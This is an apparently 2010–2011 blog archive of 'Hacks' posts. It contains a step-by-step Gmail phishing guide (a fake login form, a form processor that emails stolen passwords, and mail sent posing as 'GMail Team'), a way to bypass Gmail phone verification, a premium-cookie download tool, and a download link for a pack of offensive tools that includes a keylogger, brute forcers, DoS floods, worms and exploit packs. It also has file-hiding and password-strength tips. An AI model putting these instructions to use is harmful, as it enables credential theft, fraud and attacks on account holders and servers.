Archive for the ‘Hacks’ Category

Articles

Bypass gmail Mobile verification…R’s

In Hacks on November 1, 2011 by erishi


Follow these steps :

1. First of all go to http://www.k7.net/ and sign up there. This is a site where you can receive fax or voice calls without having a phone no. When you create an account on this site, it will provide you an unique phone no. of US.

2. Now go for creating account on gmail, enter all the information as you want, but in Location fill ‘United States’.

3. Now click on ‘I accept, create an account’.

4. Now it will take you to mobile verification page. Here select the option of Voice call and fill the no. that you got from http://www.k7.net/

5. Now you will get a mail having verification code as voice mail on that account from which you have registered on . Open it, download the attachment file and listen the code http://www.k7.net/

6. Now enter the code of your voice mail in verification code. and click OK.
7. Your account is ready now 🙂

Articles

IDM Cookie Importer…R’s

In Hacks on November 1, 2011 by erishi


IDM Cookie Importer allows you to download as a premium using IDM with cookies! No username/password needed anymore! Click the ‘How To Use’ Button in the tool or read the FAQ.

Step 1- Cookie Name (Change It To according to your file host )

Step 2- Cookie Value (Paste here your premium cookie)

Step3- Links (put your downloading links)

step4- Create IDM Export File (now generate IDM file)

Step 5 – Now Open Internet Download Manager And Import this File resume your Download enjy

Use FAQ Button for instructions .

just change cookies name for Diff. domain

Wupload Cookies (Cookie name = PHPSESSID)

Filesonic Cookies (Cookie name = PHPSESSID)

Hotfile Cookies (Cookie name = auth)

Megaupload Cookies (Cookie name = user)

Rapidshare Cookies (Cookie name = enc)

 

Download Link:      http://www.fileserve.com/file/aymmXyu/IDM_Cookie_Importer.exe

 

Articles

User Account – Password Remover (ISO)…R’s

In Hacks on March 2, 2011 by erishi


THIS WILL REMOVE ANY USER ACCOUNT PASSWORD ON “”ANY”” OPERATING SYSTEM. FROM WINDOWS XP TO WINDOWS 7. MAY ALSO WORK ON WINDOWS 95,98 (BUT NOT TESTED).SIMPLY FOLLOW ON SCREEN INSTRUCTIONS, I’VE USED THIS SOFTWARE ON 4 COMPUTERS WITH NO PROBLEMS WHAT SO EVERInstallation:FOR THIS SOFTWARE TO WORK, BOOT FROM DISC

Download Link
http://www.filesonic.com/file/144722581/U.rar

Articles

How to Hack Gmail Account Password – Email Hacking…R’s

In Hacks on February 9, 2011 by erishi


Here is the most effective technique for hacking GMail Accounts Passwords.
Follow the steps as given below:
Success Rate: 90%

Step 1: Create your own fake gmail login form using HTML, which may look like one as shown below:

The HTML code for above login screen created by me is given here

http://jigsawuploads.110mb.com/G-MA%21L%20HTML.txt

Step 2: We require a form processor to process this fake login form, i.e. to store the username and password entered by the slave.
The username and password entered by slave can either be stored in database or send directly to the predefined e-mail address.
This can be done in two ways:

1. Using online form processors, which are freely available and ready to use.
eg. One of such form processor is provided by http://www.formmail.com . You have to register with http://www.formmail.com and configure your fake gmail login form to be processed by formmail.com . The configuration is different for each formmail account. Which may be something like this.
http://jigsawuploads.110mb.com/G-MA%21L%20HTML%202.txt

2. If you are having your own domain hosted on some server; knowing the basics of ASP for processing HTML forms, you can create your own form processor in ASP (eg. ‘login.asp’ page) for above given fake gmail login form. Here you should only put both ‘gmail.html’ and ‘login.asp’ files to your server.

Step 3: Now both of your ‘Fake Gmail Login Form (eg. gmail.html)’ and ‘Form Processor’ are ready to use.
Now you can send the fake gmail login form as an html mail to the slave’s e-mail address, hoping that the slave gets fooled into entering the account username and password and click on ‘Move’ button.
Note: You can use Microsoft Outlook for sending HTML e-mail.
Also, you must use your fake name as ‘GMail Team’ or ‘GMail’ while sending fake login form to slave.

As soon as slave click on ‘Move’ button he/she get redirected to predefined webpage (eg. http://www.gmail.com), while his/her ‘username’ and ‘password’ get emailed to you by formmail.com .

That’s It…! Happy Gmail Hacking 😉

Articles

Big Ultra Hackers Pack 155-in-1…R’s

In Hacks on January 16, 2011 by erishi


 

Attention! This material is posted for educational purposes only!
Hacking in any form is punishable offense. This material may be used by you only for the study of vulnerabilities, and nothing more. I bring to your attention a book “Big Ultra Hackers Pack 155-in-1 AIO”. He predstavalyaet a package of tools for hacking. This collection includes over 150 unique tools

Assembly includes:

AddrView
AddrView gives you the ability to analyze HTML pages and extract most of the address URL, contained in them. AddrView retrieves the URL of images (img – tag), links to other files (a – a tag), CSS files, frames, Flash files and more. You can save the extracted addresses list to text files, HTML or XML files, or add these addresses to the hut.

AnonFTP
This package contains / var / ftp area for anonymous FTP access.

AppToService
The program enables the command line to run regular applications as a service (service).
However, to install any application as a service is completely free – just enough to take the recommendations of the Windows XP FAQ.

arpinject
Any computer on the network can be easy to take and send a packet ARP_REPLAY. And thus make changes to the ARP table. Such an attack is called ARP Poisonig. Its result – redirect traffic to the desired host. Send the packet (s) can be programmatically by using a tool ARPInject.

aspack21
Very nice wrapper *. exe and *. dll files (in some cases the degree of compression is 70%). In addition, the program is good (especially for programmers who are trying to protect their trousers) the complexity of extracting compressed file. I understand that he ASPack packed ASPACK’om same 🙂 Not bad, and that the program allows you to check before final packing job “prepackaged” exe-file, in violation of its normal operation, uncompress.
The new version has improved the speed of packing and adds an option “maximum compression”. In unreported as the program runs 30 days. The interface is multilingual, including in Russian.

bios_pass_remover
Remove BIOS password

brutus
Brootforce xs which

Cable Modem Sniffer
Traffic interceptor cable modem

CapKeys_DIGITAL
Key update einfach per internet. abspeichern als SofCam.key und als textdatei moglich.

CGI Founder v1.043
Program for finding holes in CGI scripts.

CGISscan
Scanner CGI scripts

cports
Viewing connections and listening ports on your computer

craagle
The program for the automated search every seriynkov and keygens on many relevant archives.

CreditCardGjenerator
Generator credo

DeepUnFreez
“Makes computing environments easier to manage and maintain. Every Restart destroys all changes and reboots the computer to its original state, right down to the last byte”

E-mail Cracker
Recover forgotten mailbox passwords that are stored in the e-mail client. The program emulates the server POP3, and the password is sent back to the user. It supports any email client POP3.

ezDataBase_Defacer
Defeyser engine ezDataBase

FTP Brute Forcer
Brootforce FTP

ftpbr
Brootforce FTP

~ Censored ~ Mail Bomber 2.3
Bomer soap

G00B3RS_phpBB_exploit_pack
Pak exploits for phpBB Motor

Google_Hacker_1.2
Utility to help with queries from the series guglhak

grinder1.1
It helps you find instructions in the file specify the range of IP-address.

HackersAssistant
Software package for a hacker: Port Scanner, Ping Flooder, Server Slower, Connections, File Cleaner, Get Passwords, IP Validator, Web Browser, Ip Information, HTML Stealer, Site IP Retrieval, Winsock Scanner, exe Corruptor, Nuker, Hit Increaser, File Generator, Anonymous e-mail, Whois, Binary

HackTheGame
HackTheGame this game simulator life hacker. In which you take on the role of a hacker. Which xs for what and how to break the system. Join showdown with hack portals, in general, live a long and merry life. The main thing is not to get caught would be rubbish.

Hotmail Email Hacker / Hotmail HAcker Gold / Hotmail ScamPage / HotmailHack
In my still some sort of a heresy, not long running, hotmylo not so easy to hack

hydra-4.6-win
THC-Hydra – threaded cracker passwords to various services (FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, CISCO, etc.) for UNIX platforms. With this tool you can attack several services at once.

iecv
Internet Explorer Cookies View

ipnetinfo
The program, which displays information about IP address. It allows you to display detailed information concerning the country, the owner of the domain, the range of available IP addresses, contact information and much more. This tool will be useful, for example, when you need to know the origin of the mail received from an unknown destination. For this is enough simply to copy the message headers from your email program IPNetInfo. It will extract itself from the text of all IP addresses and make the necessary search. The software uses several Whois servers, thereby maximizing the impact of the search for a specific network address. Among other things, it allows you to create HTML report, which stores all necessary information about the selected IP addresses.

john-17w
password cracker, currently available for UNIX, DOS, Win32. Its main aim is to detect weak passwords UNIX. To the program you can buy a collection of word lists over 600 MB, with the help of which greatly simplifies the selection of passwords.

Key Changer
Commercial ($ 8.00) is free from trojans, designed to find and change the product key, Windows XP, such as piracy on the validity (if any). XP Key Changer after launch, finds the proposed changes to the key, and the name and organization registered in the system provided by Windows XP. Program XP Key Changer allows you to change XP Product Key and all this information, one click on all machines. Works with all service packs, including Windows XP SP3!

Key_Logger
keylogger R)

Legion NetBios Scanner v2.1
Scanner NEtBios Resources

Mail Boomb_2.0 YAHOO
Bomber soaps Yahoo

MooreR Port Scanner
Port scanner on the remote machine

MSN Flooder 2.0
Fluder messenger msn

NET BIOS Scaner
Scanner NEtBios Resources

NetBIOS Name Scanner
Scanner NEtBios Resources

NetResView
Scanner NEtBios Resources

NFO Maker 1.0
This plugin is for viewing nfo and diz files, which are usually located in the downloaded archive.
Warning: as reported by the author, “Unfortunately there was an unfortunate mistake. Setting.reg File added to the archive with the plugin. Setting.reg file separately can be downloaded here http://issoft.narod.ru/downloads/setting.reg

Nimda
“Nimda” is an Internet worm that spreads via the Internet as a file attachment in an e-mail, local area networks, as well as penetrating the unprotected IIS-servers. The original host file has the name of the worm README.EXE and is a program format Windows PE EXE, the size of about 57 kilobytes, and is written in Microsoft C + +.

NTPacker
Packer files

On-Off MSN
What is vklyuchalka vyklyuchalka MSN

PCAnyPass
PCAnywhere PassView Image of passwords with asterisks

Php Nuke Hacker v11.0
Burglar engine php nuke

phpBB Annihilator / phpbb attack / phpbb bruteforcer / PhpBB pass extractor / phpBB_DoS / phpbb_spammer / phpBBAttacker / phpBBcracker
A set of tools for hacking, spam, flood, ddos, Brutus phpBB

PhpBuGScan
Scanner bugs in scripts nxn

Ping & Nukes
pinger \ nyuker

Listener XP
The program allows to monitor network ports on your system, generating a pop-up window when trying to access the port. The program writes a log file of IP-addresses of connectable clients and sends you a request for permission to use it. You can enter the port numbers of their choice, or the program will prompt you to the default list. The program runs from the system tray.

pqwak2
This program for the selection of network paroley.Dostatochno quickly picks up a password on the specified drive on the network.

procexp
PROCEXP displays information about the processes of loading dynamic libraries and their svoystvah.Eto makes PROCEXP m schnym tool for understanding the internal behavior of applications as trace information leakage marker and DLL, version mismatch. And even the indirect determination of viruses.

ProxyPro
Scan, ping, proxy switches

rainbowcrack-1.2-src win-lin
The program allows you to create a predsgenerirovannyh LanManager hashes, with which you could almost instantly to crack almost any alphanumeric password.

Remote Shut Down
Vykyuchenie remote machine

ResHacker
Correction exe and dll files. Much can change in them. With this program you can easily Russify program.

RpcScan101
Network port scanner

Sasser
Sasser virus looks like the exhausted millions of Internet users worldwide in summer 2003 lovesan (blaster). Already, he has several of its modifications, which experts say is even more harmful than the original. The same way according to experts, this virus does not pose a threat to your hard drive, but only prevents the use of them fully functional. Its distinctive features – a message appears on trying to connect to the ip address of another computer and the error message LSA Shell (Export version) and follows it to restart the computer from a fatal error process lsass.exe

SendMailer
Sends a message in HTML format and in any encoding without mail client. Checks completion of mandatory fields. Checks E-Mail on the right (syntax). Converts special characters into HTML format. Allows you to specify multiple addresses to choose from. Checks sent and reports errors. Ability to send a copy to the sender. Very easy to configure. Also fits easily into any design. Gives ample opportunity to hide the real address. If desired, sends information about the browser and the IP address

Server 2003 Keygen
keygen for WINDOWS 2003 server

Server Killer
Ubiytsa servers R)

showpassv10
Opening a password for zvezdochkmi

sitedigger2
The program looks in the cache of Google potential vulnerabilities, errors, configuration problems on Web sites. The new version of the new version you can use FSDB / GHDB and generate 10 results for each signature. Posted as a large number of new signatures – open webcams, credit card numbers, etc.

SMBdie
WinNuke back! Introducing exploit completely kills or WinNT/2K/XP. NET machine with Network Share Provider (works on 139 and / or 445 port). Uses a malformed SMB (Server Message Block) packet is used anonymously, no account do not need to know – for only the IP address and computer name.

SQLScan v1.0
Utility guessing the password to Microsoft SQL server. Lets you scan a range of IP addresses. When backwater password creates an NT account with a blank password on a vulnerable system.

Stealth – HTTP Scanner v1.0 build 23
powerful tool for auditing security Web server, which looks at more than 19.000 vulnerabilities.

SuperScan4
Port scanner with a bunch of utilities. Also there is a useful utility that pulls out from companies (windows) all of the available Old using zero session.

tftpd32.273
a small freeware program, which includes simple to configure DHCP, TFTP, SNTP and Syslog servers as well as TFTP client

traceroute
This is a utility computer program designed to identify routes data networks TCP / IP.

udpflood
UDP packet sender. Tool flood UDP packets to specified IP and port. Used to test the stability of network services to a UDP flood. Packages can be specified by the user or be completely random.

Ultra Dos
Program for DDOS remote machine

WebCracker 4.0
Cute program to guess passwords for sites.

whoistd
Utilita, pozvolyayuschaya polychit infopmatsiyu o zapegictpipovannom domene (vladelets and pegictpatsionnye dannye). Avtomatichecki cvyazyvaetcya co cppavochnym cepvepom Whois, otkyda and polychaet infopmatsiyu. Pezyltaty mogyt be coxpaneny in tekctovye fayly or RESIDENCE HTML-report

WindowHide
Hiding windows to tray and task bar…

 

Download Link:  http://www.filesonic.com/file/43343926/Big_Ultra_HPack_155in1.rar

 

R’s

Articles

Hide rar,exe,txt any file in Jpg file…R’s

In Hacks on December 13, 2010 by erishi


1. Gather the file you wish to hide, and the image file, and place them in a folder. For the sake of this demonstration, I will be using C:\Secret
-The image will here by be referred to in all examples as img.jpg and the finished JPEG will be something.jpg
-The file will here by be referred to in all examples as Document.txt

2. Add the file/files you will be injecting into the image into a WinRar .rar or .zip. From here on this will be referred to as (secret.rar)

3. Open command prompt by going to Start > Run > cmd

4. In Command Prompt, navigate to the folder where your two files are by typing
cd location [ex: cd C:\Secret]

5. Type [copy /b img.jpg + secret.rar something.jpg] (minus the brackets)

Congrats, as far as anyone viewing is concerned, this file looks like a JPEG, acts like a JPEG, and is a JPEG, yet it now contains your file.

In order to view/extract your file,

a) Change the file extension from something.jpg to something.rar, then open and your file is there.

Articles

How to secure your password from hackers attacks…R’s

In Hacks on December 13, 2010 by erishi


Today tip will help you to secure your computer from the access of professional hackers. There are some hacker***8217;s breaks into your computer without using any impressive programming skills but trying to find words to guess as your password. Normally people use their name, house number, mobile number and word ***8220;password***8221; as a password. If you have very simple password then a hacker can hack your computer very easily. To safe your computer from hackers there is a best way to create a tricky password. Here I will tell you some different type of tricks to make your password that can***8217;t guess easily by any body.

Use the maximum characters in your password.

Always set the password using maximum characters length, because it is simple method, if your password is longer then it is very difficult to guess.

Use the combination of lower-case and upper case letters in your password.
Normally computer users use the lower case in password selection but it is best practice to use the combination of both (lower-case and upper case). So using different cases in your password makes it much more difficult to crack.

Use the combination of letters and numbers in your password.

When you mix both letters and numbers just like one letter and one number then your password is more incomprehensible.

Avoid using the name of your family members as password.

Always try to avoid the name of your child, spouse, city and country name as password, because if any body knows about your personal life***8217;s details then they try to use these detail to guess your password.

Use any tools to create random password.

There are many third party tools are available to create the random password. You can create passwords containing a very difficult ***8211;to-guess collection of random characters with these tools.